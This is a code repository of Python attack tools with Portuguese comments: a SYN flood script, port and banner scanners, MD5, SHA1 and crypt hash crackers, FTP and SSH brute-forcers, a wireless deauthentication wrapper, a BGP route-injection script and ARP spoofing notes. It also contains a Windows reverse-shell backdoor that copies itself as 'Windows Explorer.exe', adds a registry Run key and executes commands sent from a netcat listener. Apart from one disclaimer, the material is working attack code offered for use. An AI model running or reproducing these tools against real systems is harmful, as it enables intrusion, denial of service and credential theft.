├── .gitignore ├── network ├── assets │ └── ascii_logo.txt ├── syn-flood-attack.py ├── portscan.py ├── anotations │ └── arp │ │ ├── change-mac-arp-table │ │ ├── commands-scapy │ │ ├── index │ │ └── arp-spoofing-mim.py ├── retbanner.py ├── sha1has.py ├── hasher.py ├── md5brute.py ├── cryptforce.py ├── ftpbruteforce.py ├── aicrack.py ├── BGP │ └── simple-bgp-attack.py ├── brutesh.py ├── scanner │ └── scanner-with-scapy │ │ ├── src │ │ ├── main.py │ │ ├── capture.py │ │ └── gui.py │ │ └── scanner_line_filter.py ├── advancedscanner.py ├── vulscan.py ├── backdoor-and-persistence.py └── zeroday.py ├── requirements.txt └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__/ -------------------------------------------------------------------------------- /network/assets/ascii_logo.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | scapy>=2.5.0 2 | rich>=13.0.0 3 | requests>=2.0.0 4 | bullet>=2.2.0 # OR questionary>=1.10.0 (up down key) 5 | questionary>=1.10.0 6 | 7 | termcolor>=2.3.0 8 | tqdm>=4.60.0 9 | netifaces>=0.10.9 10 | paramiko>=3.0.0 -------------------------------------------------------------------------------- /network/syn-flood-attack.py: -------------------------------------------------------------------------------- 1 | 2 | # SYN Flood Attack (DoS) 3 | # Sends thousands of TCP SYN packets with fake IPs and ports to work or target. 4 | 5 | # 👉 Real-world use: Test server resilience or simulate a DoS attack. 6 | # On some routers, the admin service may crash. 7 | 8 | from scapy.all import * 9 | 10 | target = "192.168.1.1" 11 | 12 | while True: 13 | pkt = IP(dst=target, src=RandIP()) / TCP(sport=RandShort(), dport=80, flags="S") 14 | send(pkt, verbose=0) 15 | -------------------------------------------------------------------------------- /network/portscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | from termcolor import colored 5 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | #socket.setdefaulttimeout(1) 7 | 8 | host = input("[*] Enter Host to scan: ") 9 | 10 | def portscanner(port): 11 | if sock.connect_ex((host,port)): 12 | print(colored("[!!] Port %d is closed" % (port), 'red')) 13 | else: 14 | print(colored("[+] Port %d is opened" % (port), 'green')) 15 | 16 | 17 | for port in range(1,65535): 18 | portscanner(port) 19 | -------------------------------------------------------------------------------- /network/anotations/arp/change-mac-arp-table: -------------------------------------------------------------------------------- 1 | 2 | >>> finalpacket.pdst = "192.168.100.6" 3 | >>> mac_address = broadcast = Ether(dst="ff:ff:ff:ff:ff:ff") 4 | >>> broadcast = Ebroadcast = Ether(dst="ff:ff:ff:ff:ff:ff") 5 | >>> answer = srp(finalpacket, timeout=2, verbose=False)[0] 6 | >>> answer 7 | 8 | >>> mac = answer[0][1].hwsrc 9 | >>> mac 10 | '60:02:92:60:da:ed' 11 | >>> send(packet, verbose=False) 12 | >>> packet = ARP(op=2, hwdst="60:02:92:60:da:ed", pdst="192.168.100.6", psrc = "192.168.100.4") 13 | >>> send(packet, verbose=False) 14 | 15 | 16 | -------------------------------------------------------------------------------- /network/retbanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | 5 | def retBanner(ip, port): 6 | try: 7 | socket.setdefaulttimeout(2) 8 | s = socket.socket() 9 | s.connect((ip,port)) 10 | banner = s.recv(1024) 11 | return banner 12 | except: 13 | return 14 | 15 | def main(): 16 | ip = input("[*] Enter Target Ip: ") 17 | for port in range(1,65535): 18 | banner = retBanner(ip, port) 19 | if banner: 20 | print("[+] " + ip + "/" + str(port) + ": " + str(banner).strip('/n').strip('\/x00\/').strip('\/r')) 21 | 22 | main() 23 | -------------------------------------------------------------------------------- /network/sha1has.py: -------------------------------------------------------------------------------- 1 | from urllib.request import urlopen 2 | import hashlib 3 | 4 | sha1hash = input("[*] Enter sha1 Hash Value: ") 5 | passlist = str(urlopen('https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-1000.txt').read(), 'utf-8') 6 | 7 | for password in passlist.split('\n'): 8 | hashguess = hashlib.sha1(bytes(password, 'utf-8')).hexdigest() 9 | if hashguess == sha1hash: 10 | print("[+] The password is: " + str(password)) 11 | quit() 12 | else: 13 | print("[-] Password guess" + str(password) + " does not match, tryng next ...") 14 | 15 | print("Password not in passwordlist") 16 | -------------------------------------------------------------------------------- /network/hasher.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | 3 | hashvalue = input("Enter a string to hash: ") 4 | 5 | hashobj1 = hashlib.md5() 6 | hashobj1.update(hashvalue.encode()) 7 | print('md5: \n' + hashobj1.hexdigest()) 8 | 9 | hashobj2 = hashlib.sha1() 10 | hashobj2.update(hashvalue.encode()) 11 | print('sha1: \n' + hashobj2.hexdigest()) 12 | 13 | hashobj3 = hashlib.sha224() 14 | hashobj3.update(hashvalue.encode()) 15 | print('sha224: \n' + hashobj3.hexdigest()) 16 | 17 | hashobj4 = hashlib.sha256() 18 | hashobj4.update(hashvalue.encode()) 19 | print('sha256: \n' +hashobj4.hexdigest()) 20 | 21 | hashobj5 = hashlib.sha512() 22 | hashobj5.update(hashvalue.encode()) 23 | print('sha512: \n' + hashobj5.hexdigest()) 24 | 25 | -------------------------------------------------------------------------------- /network/md5brute.py: -------------------------------------------------------------------------------- 1 | from termcolor import colored 2 | import hashlib 3 | 4 | 5 | 6 | def tryOpen(wordlist): 7 | global pass_file 8 | try: 9 | pass_file = open(wordlist, "r") 10 | except: 11 | print("[!!] No such File at that path") 12 | 13 | 14 | pass_hash = input("[+] Enter MD5 Hash value: ") 15 | wordlist = input("[+] Enter Path To the password File: ") 16 | 17 | tryOpen(wordlist) 18 | 19 | for word in pass_file: 20 | print(colored("[-] Trying:" + word.strip("\n"), 'red')) 21 | enc_wrd = word.encode('utf-8') 22 | md5digest = hashlib.md5(enc_wrd.strip()).hexdigest() 23 | 24 | if md5digest == pass_hash: 25 | print(colored("[+] Password Found: " + word, 'green')) 26 | exit(0) 27 | 28 | print("[!!] Password Not In List!") 29 | -------------------------------------------------------------------------------- /network/cryptforce.py: -------------------------------------------------------------------------------- 1 | import crypt 2 | from termcolor import colored 3 | 4 | def crackPass(cryptWord): 5 | salt = cryptWord[0:2] 6 | dictionary = open("dictionary.txt", "r") 7 | for word in dictionary.readlines(): 8 | word = word.strip('\n') 9 | cryptPass = crypt.crypt(word, salt) 10 | if (cryptWord == cryptPass): 11 | print(colored("[+] Found password: " + word, 'green')) 12 | else: 13 | print( colored("[-] Not Found password: " + word, 'red')) 14 | 15 | 16 | def main(): 17 | passFile = open('pass2.txt', 'r') 18 | for line in passFile.readlines(): 19 | if ":" in line: 20 | user = line.split(':')[0] 21 | cryptWord = line.split(':')[1].strip( ).strip('\n') 22 | print("[*] Cracking password for: " + user) 23 | crackPass(cryptWord) 24 | 25 | 26 | main() 27 | -------------------------------------------------------------------------------- /network/ftpbruteforce.py: -------------------------------------------------------------------------------- 1 | import ftplib 2 | from termcolor import colored 3 | 4 | def bruteLogin(hostname, passwdFile): 5 | try: 6 | pF = open(passwdFile, "r") 7 | except: 8 | print("[!!] File Doesnt Exist!") 9 | 10 | for line in pF.readlines(): 11 | userName = line.split(':')[0] 12 | password = line.split(':')[1].strip('\n') 13 | print("[+] Trying: " + userName + "/" + password) 14 | try: 15 | ftp = ftplib.FTP(hostname) 16 | login = ftp.login(userName, password) 17 | print(colored("[+] Login Succed With: " + userName + "/" + password, "blue")) 18 | ftp.quit() 19 | return(userName, password) 20 | except: 21 | pass 22 | print(colored("[-] Password Not in List","red")) 23 | 24 | 25 | host = input("[*] Enter Targets IP Address: ") 26 | passwdFile = input("[*] Enter User/Password File Path: ") 27 | bruteLogin(host, passwdFile) 28 | -------------------------------------------------------------------------------- /network/aicrack.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | from rich.console import Console 4 | from rich.prompt import Prompt 5 | 6 | console = Console() 7 | 8 | def header(): 9 | console.print("[b cyan]AICrack - Automated Wireless Deauthentication[/b cyan]\n", style="bold blue") 10 | console.print("Automates aireplay-ng deauthentication attacks for WPA/WPA2 networks.\n") 11 | 12 | def main(): 13 | header() 14 | iface = Prompt.ask("Enter wireless interface (e.g. wlp6s0mon)") 15 | bssid = Prompt.ask("Enter access point BSSID (e.g. fe80::c18a:b505:4f0c:aae8)") 16 | essid = Prompt.ask("Enter ESSID (name of the wifi network)") 17 | count = Prompt.ask("Deauth packets count to send [0 = infinite]", default="0") 18 | 19 | # Disclaimer 20 | console.print("[red bold]WARNING: Only use this tool for authorized penetration testing![/red bold]") 21 | 22 | cmd = f"aireplay-ng -0 {count} -e '{essid}' -a {bssid} {iface}" 23 | console.print(f"\n[b]Running:[/b] [green]{cmd}[/green]\n") 24 | os.system(cmd) 25 | 26 | if __name__ == '__main__': 27 | main() -------------------------------------------------------------------------------- /network/BGP/simple-bgp-attack.py: -------------------------------------------------------------------------------- 1 | import scapy.all as scapy 2 | from scapy.contrib.bgp import * 3 | 4 | 5 | # IPs dos roteadores envolvidos 6 | src_ip = "45.167.104.0" # seu roteador falso 7 | dst_ip = "45.167.104.0" # roteador vítima 8 | 9 | # Porta TCP usada pelo BGP 10 | src_port = scapy.RandShort() 11 | dst_port = 179 12 | 13 | # Criando um pacote OPEN (ASN 65099 contra vítima ASN 65001) 14 | open_msg = BGPHeader(type=1)/BGPOpen( 15 | version=4, 16 | my_as=65099, 17 | hold_time=90, 18 | bgp_id="45.167.104.0", 19 | opt_param_len=0 20 | ) 21 | 22 | pkt = scapy.IP(src=src_ip, dst=dst_ip)/TCP(sport=src_port, dport=dst_port, flags="PA")/open_msg 23 | scapy.send(pkt) 24 | 25 | 26 | 27 | 28 | update_msg = BGPHeader(type=2)/BGPUpdate( 29 | path_attr=[ 30 | scapy.BGPPathAttrOrigin(value=0), # origin IGP 31 | scapy.BGPPathAttrASPath(val=[65099]), # Path your ASN 32 | scapy.BGPPathAttrNextHop(value="45.167.104.0"), # next (you) 33 | ], 34 | nlri=[IPField("prefix", "203.0.113.0/24")] # prefix 35 | ) 36 | 37 | pkt_update = scapy.IP(src=src_ip, dst=dst_ip)/TCP(sport=src_port, dport=dst_port, flags="PA")/update_msg 38 | scapy.send(pkt_update) 39 | -------------------------------------------------------------------------------- /network/brutesh.py: -------------------------------------------------------------------------------- 1 | import pexpect 2 | from termcolor import colored 3 | 4 | 5 | PROMPT = ['# ','>>> ','> ','\s '] 6 | 7 | def send_command(child, command): 8 | child.sendline(command) 9 | child.expect(PROMPT) 10 | print(child.before) 11 | 12 | def connect(user, host, password): 13 | ssh_newkeyMessage = 'Are you sure you want to continue connecting?' 14 | connStr = 'ssh -oHostKeyAlgorithms=+ssh-dss ' + user + '@' + host 15 | child = pexpect.spawn(connStr) 16 | ret = child.expect([pexpect.TIMEOUT, ssh_newkeyMessage, '[P|p|assword: ]']) 17 | if ret == 0: 18 | print('[-] Error Connection') 19 | return 20 | if ret == 1: 21 | child.sendline('yes') 22 | ret = child.expect([pexpect.TIMEOUT, '[P|p|assword: ]']) 23 | if ret == 0: 24 | print('[-] Error connection') 25 | return 26 | child.sendline(password) 27 | child.expect(PROMPT, timeout=0.5) 28 | return child 29 | 30 | def main(): 31 | host = input("Enter IP Address of Target To Bruteforce: ") 32 | user = input("Enter User Account You Want To Bruteforce: ") 33 | file = open("passwords.txt","r") 34 | for password in file.readlines(): 35 | try: 36 | child = connect(user, host, password) 37 | print(colored("[+] Password Found: " + password, 'green')) 38 | #whoami = Cabeçalho "quem sou eu" 39 | send_command(child, "whoami") 40 | except: 41 | print(colored("[-] Wrong Password "+ password, 'red')) 42 | 43 | 44 | main() 45 | -------------------------------------------------------------------------------- /network/scanner/scanner-with-scapy/src/main.py: -------------------------------------------------------------------------------- 1 | """ 2 | main.py 3 | 4 | Entrypoint: inicia o sniffer e lança a GUI. 5 | """ 6 | 7 | import argparse 8 | import sys 9 | import os 10 | 11 | # Tentativa de importar como pacote ou como módulo direto (para execução flexível) 12 | try: 13 | from . import capture 14 | from .gui import ProtocolVisualizer 15 | except Exception: 16 | import capture 17 | from gui import ProtocolVisualizer 18 | 19 | def parse_args(): 20 | parser = argparse.ArgumentParser(description="Simple Scanner — Network Protocol Visualizer (Scapy + Tkinter)") 21 | parser.add_argument("-i", "--interface", help="Interface to sniff (default: system default)") 22 | parser.add_argument("-f", "--filter", help="pcap/BPF filter expression (e.g. 'port 53')") 23 | return parser.parse_args() 24 | 25 | def check_privileges(): 26 | # Em POSIX, sniffing geralmente exige root. 27 | if os.name != "nt": 28 | try: 29 | if os.geteuid() != 0: 30 | print("Aviso: sniffing geralmente requer privilégios root. Execute com sudo se não aparecerem pacotes.", file=sys.stderr) 31 | except AttributeError: 32 | pass 33 | 34 | def main(): 35 | args = parse_args() 36 | check_privileges() 37 | 38 | try: 39 | capture.start_sniff(interface=args.interface, bpf_filter=args.filter) 40 | except Exception as e: 41 | print("Falha ao iniciar sniffer:", e, file=sys.stderr) 42 | 43 | app = ProtocolVisualizer() 44 | app.mainloop() 45 | 46 | if __name__ == "__main__": 47 | main() -------------------------------------------------------------------------------- /network/advancedscanner.py: -------------------------------------------------------------------------------- 1 | from socket import * 2 | import optparse 3 | from threading import * 4 | 5 | 6 | def connScan(tgtHost, tgtPort): 7 | try: 8 | sock = socket(AF_INET, SOCK_STREAM) 9 | sock.connect((tgtHost, tgtPort)) 10 | print( '[+] %d/tcp Open' % tgtPort) 11 | except: 12 | print('[-] %d/tcp Closed' % tgtPort) 13 | finally: 14 | sock.close() 15 | 16 | def portScan(tgtHost, tgtPorts): 17 | try: 18 | tgtIP = gethostbyname(tgtHost) 19 | except: 20 | print( 'Unknown Host %s ' %tgtHost ) 21 | try: 22 | tgtName = gethostbyaddr(tgtIP) 23 | print( '[+] Scan Results for: ' + tgtName[0] ) 24 | except: 25 | print( '[+] Scan Results for: ' + tgtIP ) 26 | setdefaulttimeout(1) 27 | for tgtPort in tgtPorts: 28 | t = Thread(target=connScan, args=(tgtHost, int(tgtPort))) 29 | t.start() 30 | 31 | def main(): 32 | parser = optparse.OptionParser('Usage of Program: ' + '-H -p ') 33 | parser.add_option('-H', dest='tgtHost', type='string', help='specify target host') 34 | parser.add_option('-p', dest='tgtPort', type='string', help='specify target ports separeted by comma') 35 | (options, args) = parser.parse_args() 36 | tgtHost = options.tgtHost 37 | tgtPorts = str(options.tgtPort).split(',') 38 | if tgtHost is None or not tgtPorts: 39 | print(parser.usage) 40 | exit(0) 41 | portScan(tgtHost, tgtPorts) 42 | 43 | 44 | def get_args(): 45 | return [ 46 | {"flag": "-H", "desc": "Target host (required)"}, 47 | {"flag": "-p", "desc": "Port (required)"} 48 | ] 49 | 50 | if __name__ == '__main__': 51 | main() 52 | 53 | 54 | -------------------------------------------------------------------------------- /network/vulscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | from difflib import SequenceMatcher 7 | 8 | def _strip(aaaa): 9 | return aaaa.strip("\/n").strip("b'").strip("\/r").strip("\/r\/n") 10 | 11 | #Recebe o banner do Host através do socket 12 | def retBanner(ip, port): 13 | try: 14 | socket.setdefaulttimeout(2) 15 | s = socket.socket() 16 | s.connect((ip,port)) 17 | banner = s.recv(1024) 18 | return banner 19 | except: 20 | return 21 | #Obtem a pontuação da similaridade da string do banner 22 | def similar_strings(str1, str2): 23 | seq_matcher = SequenceMatcher(None, str1, str2) 24 | similaridade = seq_matcher.ratio() 25 | 26 | return similaridade 27 | 28 | def checkVulns(banner, filename): 29 | f = open(filename, "r") 30 | 31 | for line in f.readlines(): 32 | 33 | if similar_strings(line, str(banner)) > 0.5: 34 | print(" [!] Server is vulnerable: " + str(banner)) 35 | 36 | def main(): 37 | if len(sys.argv) == 2: 38 | filename = sys.argv[1] 39 | if not os.path.isfile(filename): 40 | print('[-] File Doesnt Exist') 41 | exit(0) 42 | if not os.access(filename, os.R_OK): 43 | print('[-] Access Denied!') 44 | exit(0) 45 | else: 46 | print('[-] Usage: ' + str(sys.argv[0]) + '') 47 | exit(0) 48 | portlist = [21,22,25,80,110,443,445] 49 | for x in range(41,42): 50 | ip = "192.168.100." + str(x) 51 | for port in portlist: 52 | banner = retBanner(ip, port) 53 | if banner: 54 | print('[+] ' + ip + '/' + str(port) + " : " + _strip(str(banner))) 55 | checkVulns(banner, filename) 56 | 57 | main() 58 | -------------------------------------------------------------------------------- /network/scanner/scanner-with-scapy/src/capture.py: -------------------------------------------------------------------------------- 1 | """ 2 | capture.py 3 | 4 | Wrapper simples em torno de AsyncSniffer que mantém um Counter thread-safe 5 | com os nomes das camadas/protocolos observados. 6 | """ 7 | 8 | from scapy.all import AsyncSniffer 9 | from collections import Counter 10 | import threading 11 | 12 | # Estado compartilhado 13 | PROTOCOL_COUNTER = Counter() 14 | _LOCK = threading.Lock() 15 | _SNIFFER = None 16 | 17 | def _layer_names_from_pkt(pkt): 18 | """ 19 | Extrai nomes das camadas de um pacote Scapy percorrendo a cadeia de payload. 20 | Retorna uma lista de nomes distintos (ordem preservada). 21 | """ 22 | names = [] 23 | current = pkt 24 | seen = set() 25 | while current: 26 | try: 27 | name = current.__class__.__name__ 28 | except Exception: 29 | name = str(type(current)) 30 | if name not in seen: 31 | names.append(name) 32 | seen.add(name) 33 | try: 34 | current = current.payload 35 | if current is None or current.__class__.__name__ == "NoPayload": 36 | break 37 | except Exception: 38 | break 39 | return names 40 | 41 | def _packet_callback(pkt): 42 | names = _layer_names_from_pkt(pkt) 43 | if not names: 44 | return 45 | with _LOCK: 46 | for n in names: 47 | PROTOCOL_COUNTER[n] += 1 48 | 49 | def start_sniff(interface=None, bpf_filter=None, store=False): 50 | """ 51 | Inicia captura em background. Se já estiver rodando, não faz nada. 52 | interface: nome da interface (ou None) 53 | bpf_filter: string de filtro pcap/BPF 54 | store: armazenar pacotes na memória (padrão False) 55 | """ 56 | global _SNIFFER 57 | if _SNIFFER and getattr(_SNIFFER, "running", False): 58 | return 59 | _SNIFFER = AsyncSniffer(iface=interface, filter=bpf_filter, prn=_packet_callback, store=store) 60 | _SNIFFER.start() 61 | 62 | def stop_sniff(): 63 | global _SNIFFER 64 | if _SNIFFER: 65 | try: 66 | _SNIFFER.stop() 67 | except Exception: 68 | pass 69 | _SNIFFER = None 70 | 71 | def get_counts(): 72 | """ 73 | Retorna um snapshot (dict) das contagens de protocolos. 74 | """ 75 | with _LOCK: 76 | return dict(PROTOCOL_COUNTER) 77 | 78 | def clear_counts(): 79 | with _LOCK: 80 | PROTOCOL_COUNTER.clear() -------------------------------------------------------------------------------- /network/scanner/scanner-with-scapy/scanner_line_filter.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | from scapy.all import sniff 3 | from scapy.layers.inet import IP, TCP, UDP, ICMP 4 | from scapy.layers.l2 import Ether 5 | 6 | def scapy_filter(pkt, expression): 7 | """Avalia se um pacote confere com a expressão de filtro.""" 8 | # Expressões básicas: "proto.field == value" 9 | # Exemplo: "ip.dst == 192.168.0.1" 10 | try: 11 | if "==" in expression: 12 | left, right = expression.split("==", 1) 13 | left = left.strip() 14 | right = right.strip() 15 | if "." in left: 16 | proto, field = left.split(".", 1) 17 | else: 18 | proto, field = left, "" 19 | proto = proto.lower() 20 | # Identifique o protocolo 21 | scapy_layer = { 22 | 'ip': IP, 23 | 'tcp': TCP, 24 | 'udp': UDP, 25 | 'icmp': ICMP, 26 | 'ether': Ether, 27 | }.get(proto) 28 | if not scapy_layer or not pkt.haslayer(scapy_layer): 29 | return False 30 | scapy_pkt = pkt[scapy_layer] 31 | if hasattr(scapy_pkt, field): 32 | value = getattr(scapy_pkt, field) 33 | return str(value) == right 34 | # Default: Tudo passa se não reconhecer o filtro 35 | return True 36 | except Exception: 37 | return False 38 | 39 | def format_pkt(pkt): 40 | """Formata o pacote em linha única, estilo Wireshark.""" 41 | summary = pkt.summary() 42 | return summary 43 | 44 | def main(): 45 | parser = argparse.ArgumentParser(description="Scanner with filters like Wireshark (simple)") 46 | parser.add_argument("-i", "--interface", help="Network interface", default=None) 47 | parser.add_argument("-f", "--filter", help="Filter, ex: 'ip.dst == 192.168.1.1'", default="") 48 | parser.add_argument("-c", "--count", type=int, help="Number of packets to capture (Ctrl+C to stop)", default=0) 49 | args = parser.parse_args() 50 | 51 | print(f"[*] Capturing in interface: {args.interface or 'wlan0'}") 52 | if args.filter: 53 | print(f"[*] Active filter: {args.filter}") 54 | 55 | def pkt_callback(pkt): 56 | if not args.filter or scapy_filter(pkt, args.filter): 57 | print(format_pkt(pkt)) 58 | 59 | sniff(prn=pkt_callback, iface=args.interface, count=args.count) 60 | 61 | if __name__ == "__main__": 62 | main() -------------------------------------------------------------------------------- /network/backdoor-and-persistence.py: -------------------------------------------------------------------------------- 1 | #nc -vv -l -p 4444 2 | 3 | import socket 4 | import subprocess 5 | import json 6 | import os 7 | import sys 8 | import shutil 9 | 10 | class Backdoor: 11 | def __init__(self, ip, port): 12 | self.become_persistent() 13 | self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 14 | self.connection.connect((ip,port)) 15 | 16 | 17 | def become_persistent(self): 18 | evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe" 19 | if not os.path.exists(evil_file_location): 20 | shutil.copyfile(sys.executable, evil_file_location) 21 | subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v test /t REG_SZ /d "' + evil_file_location + '"',shell=True) 22 | 23 | 24 | def execute_system_command(self,command): 25 | return subprocess.check_output(command,shell=True, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL) 26 | 27 | def change_working_directory_to(self,path): 28 | os.chdir(path) 29 | return path 30 | 31 | def read_file(self,path): 32 | with open(path, 'rb') as file: 33 | return file.read() 34 | 35 | def run(self): 36 | while True: 37 | command = self.connection.recv(1024) 38 | data = json.loads(command) 39 | 40 | if data[0] == "exit": 41 | self.connection.close() 42 | sys.exit() 43 | elif data[0] == 'cd' and len(data[0]) > 1: 44 | command_result = self.change_working_directory_to(data[1].encode()) 45 | elif data[0] == 'download': 46 | command_result = self.read_file(data[1]) 47 | else: 48 | # Executa o comando que a vítima recebe de texto 49 | command_result = self.execute_system_command(data) 50 | 51 | # digitiar no kali "hello from kali" + enter 52 | # Envia o resultado do comando ;) executado na vítima 53 | self.connection.send(command_result) 54 | 55 | # message = "\n [+] connection establisheed \n" 56 | # connection.send(message.encode()) 57 | # Receber msg = max 1024 chars 58 | # connection.close() 59 | 60 | # file_name = sys._MEIPASS + "\document.pdf" 61 | # subprocess.Popen(file_name,shell = True) 62 | 63 | try: 64 | my_backdoor = Backdoor("192.168.0.158", 4444) 65 | my_backdoor.run() 66 | except Exception: 67 | sys.exit() 68 | -------------------------------------------------------------------------------- /network/scanner/scanner-with-scapy/src/gui.py: -------------------------------------------------------------------------------- 1 | """ 2 | gui.py 3 | 4 | Interface Tkinter que exibe um gráfico de barras (matplotlib) atualizando 5 | a cada segundo com as contagens de protocolos. 6 | """ 7 | 8 | import tkinter as tk 9 | from tkinter import ttk, messagebox 10 | from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg 11 | import matplotlib.pyplot as plt 12 | 13 | # Import capture local module (assume execução a partir da raiz do projeto) 14 | import capture 15 | 16 | REFRESH_MS = 1000 # intervalo de atualização em milissegundos 17 | 18 | class ProtocolVisualizer(tk.Tk): 19 | def __init__(self): 20 | super().__init__() 21 | self.title("Simple Scanner — Network Protocol Visualizer") 22 | self.protocol("WM_DELETE_WINDOW", self._on_close) 23 | 24 | # Figura matplotlib 25 | self.fig, self.ax = plt.subplots(figsize=(8, 4)) 26 | self.canvas = FigureCanvasTkAgg(self.fig, master=self) 27 | canvas_widget = self.canvas.get_tk_widget() 28 | canvas_widget.pack(fill=tk.BOTH, expand=True) 29 | 30 | # Controles 31 | ctrl_frame = ttk.Frame(self) 32 | ctrl_frame.pack(fill=tk.X) 33 | self.start_stop_btn = ttk.Button(ctrl_frame, text="Stop Sniffing", command=self.toggle_sniffer) 34 | self.start_stop_btn.pack(side=tk.LEFT, padx=5, pady=5) 35 | self.clear_btn = ttk.Button(ctrl_frame, text="Clear Counts", command=self.clear_counts) 36 | self.clear_btn.pack(side=tk.LEFT, padx=5, pady=5) 37 | 38 | self._sniffing = True 39 | self._after_id = None 40 | self._update_plot() # inicia loop de atualização 41 | 42 | def toggle_sniffer(self): 43 | if self._sniffing: 44 | capture.stop_sniff() 45 | self._sniffing = False 46 | self.start_stop_btn.config(text="Start Sniffing") 47 | else: 48 | capture.start_sniff() 49 | self._sniffing = True 50 | self.start_stop_btn.config(text="Stop Sniffing") 51 | 52 | def clear_counts(self): 53 | capture.clear_counts() 54 | self._redraw({}) 55 | 56 | def _redraw(self, counts_dict): 57 | self.ax.clear() 58 | if not counts_dict: 59 | self.ax.text(0.5, 0.5, "No packets yet", ha="center", va="center") 60 | self.ax.set_xticks([]) 61 | self.ax.set_yticks([]) 62 | else: 63 | items = sorted(counts_dict.items(), key=lambda kv: kv[1], reverse=True) 64 | names = [k for k, v in items] 65 | vals = [v for k, v in items] 66 | bars = self.ax.bar(names, vals, color="tab:blue") 67 | self.ax.set_xlabel("Protocol Layer") 68 | self.ax.set_ylabel("Count") 69 | self.ax.set_xticklabels(names, rotation=45, ha="right") 70 | # anotar barras 71 | for bar, v in zip(bars, vals): 72 | self.ax.text(bar.get_x() + bar.get_width() / 2, v, str(v), ha="center", va="bottom", fontsize=8) 73 | self.fig.tight_layout() 74 | self.canvas.draw_idle() 75 | 76 | def _update_plot(self): 77 | counts = capture.get_counts() 78 | self._redraw(counts) 79 | self._after_id = self.after(REFRESH_MS, self._update_plot) 80 | 81 | def _on_close(self): 82 | if messagebox.askokcancel("Quit", "Stop sniffing and quit?"): 83 | try: 84 | if self._after_id: 85 | self.after_cancel(self._after_id) 86 | except Exception: 87 | pass 88 | capture.stop_sniff() 89 | self.destroy() -------------------------------------------------------------------------------- /network/anotations/arp/commands-scapy: -------------------------------------------------------------------------------- 1 | Obter o endereço MAC de um determinado IP através de ARP 2 | 3 | 4 | >>> broadcast = Ether(dst="ff:ff:ff:ff:ff:ff") 5 | >>> arppacket = ARP(pdst="192.168.100.1") 6 | >>> arppacket.show() 7 | ###[ ARP ]### 8 | hwtype = Ethernet (10Mb) 9 | ptype = IPv4 10 | hwlen = None 11 | plen = None 12 | op = who-has 13 | hwsrc = 08:00:27:cb:7e:f5 (meu próprio MAC ADDRESS) 14 | psrc = 192.168.100.9 15 | hwdst = 00:00:00:00:00:00 16 | pdst = 192.168.100.1 17 | 18 | >>> finalpacket = broadcast/arppacket 19 | >>> finalpacket.show() 20 | ###[ Ethernet ]### 21 | dst = ff:ff:ff:ff:ff:ff 22 | src = 08:00:27:cb:7e:f5 23 | type = ARP 24 | ###[ ARP ]### 25 | hwtype = Ethernet (10Mb) 26 | ptype = IPv4 27 | hwlen = None 28 | plen = None 29 | op = who-has 30 | hwsrc = 08:00:27:cb:7e:f5 31 | psrc = 192.168.100.9 32 | hwdst = 00:00:00:00:00:00 33 | pdst = 192.168.100.1 34 | 35 | >>> answer = srp(finalpacket, timeout=2, verbose=True)[0] 36 | Begin emission: 37 | Finished sending 1 packets. 38 | 39 | Received 1 packets, got 1 answers, remaining 0 packets 40 | >>> answer 41 | 42 | >>> mac_address = answer[0][1].hwdst 43 | >>> print(mac_address) 44 | 08:00:27:cb:7e:f5 45 | >>> mac_address = answer[0][1].hwsrc 46 | >>> mac_address 47 | 'f8:6c:e1:51:94:31' (AQUI DESCOBRIMOS O ENDEREÇO MAC DO ALVO) 48 | 49 | 50 | 51 | Atualizar a tabela de mac address de um determinado alvo 52 | 53 | 54 | >>> finalpacket.pdst = "192.168.100.6" 55 | >>> broadcast = Ebroadcast = Ether(dst="ff:ff:ff:ff:ff:ff") 56 | >>> answer = srp(finalpacket, timeout=2, verbose=False)[0] 57 | >>> answer 58 | 59 | >>> mac = answer[0][1].hwsrc 60 | >>> print(mac) 61 | f8:6c:e1:51:94:31 62 | . 63 | Sent 1 packets. 64 | >>> packet = ARP(op=2, hwdst="f8:6c:e1:51:94:31", pdst="192.168.100.6", psrc = "1 65 | ...: 92.168.100.9") 66 | >>> send(packet, verbose=True) 67 | . 68 | Sent 1 packets. 69 | 70 | 71 | Antes: 72 | 73 | C:\Users\batman>arp -a 74 | 75 | Interface: 192.168.100.6 --- 0x7 76 | Internet Address Physical Address Type 77 | 192.168.100.1 f8-6c-e1-51-94-31 dynamic 78 | 192.168.100.4 0c-91-92-7b-f1-c4 dynamic 79 | 192.168.100.7 28-b2-bd-66-c4-8e dynamic 80 | 192.168.100.255 ff-ff-ff-ff-ff-ff static 81 | 224.0.0.2 01-00-5e-00-00-02 static 82 | 224.0.0.22 01-00-5e-00-00-16 static 83 | 224.0.0.251 01-00-5e-00-00-fb static 84 | 224.0.0.252 01-00-5e-00-00-fc static 85 | 239.255.255.250 01-00-5e-7f-ff-fa static 86 | 255.255.255.255 ff-ff-ff-ff-ff-ff static 87 | 88 | 89 | Depois: 90 | 91 | 92 | C:\Users\batman>arp -a 93 | 94 | Interface: 192.168.100.6 --- 0x7 95 | Internet Address Physical Address Type 96 | 192.168.100.1 f8-6c-e1-51-94-31 dynamic 97 | 192.168.100.4 0c-91-92-7b-f1-c4 dynamic 98 | 192.168.100.7 28-b2-bd-66-c4-8e dynamic 99 | 192.168.100.9 08-00-27-cb-7e-f5 dynamic >> Mudança 100 | 192.168.100.255 ff-ff-ff-ff-ff-ff static 101 | 224.0.0.2 01-00-5e-00-00-02 static 102 | 224.0.0.22 01-00-5e-00-00-16 static 103 | 224.0.0.251 01-00-5e-00-00-fb static 104 | 224.0.0.252 